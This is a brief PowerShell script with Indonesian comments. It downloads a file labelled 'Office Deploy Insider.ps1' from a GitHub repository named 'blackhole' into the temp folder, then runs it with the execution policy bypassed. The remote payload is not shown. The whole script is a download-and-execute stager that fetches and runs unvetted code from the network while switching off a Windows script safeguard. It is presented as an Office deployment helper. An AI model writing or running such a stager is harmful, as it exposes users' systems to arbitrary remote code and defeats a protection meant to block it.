$downloadUrl = 'https://raw.githubusercontent.com/almaheras/blackhole/refs/heads/main/Office%20Deploy%20Insider.ps1' $tempFilePath = [System.IO.Path]::Combine($env:TEMP, 'OfficeDeployInsider.ps1') # Mengunduh file .ps1 ke direktori sementara Invoke-WebRequest -Uri $downloadUrl -OutFile $tempFilePath # Menjalankan file PowerShell yang diunduh Start-Process -FilePath "powershell.exe" -ArgumentList "-ExecutionPolicy Bypass -File $tempFilePath" -Wait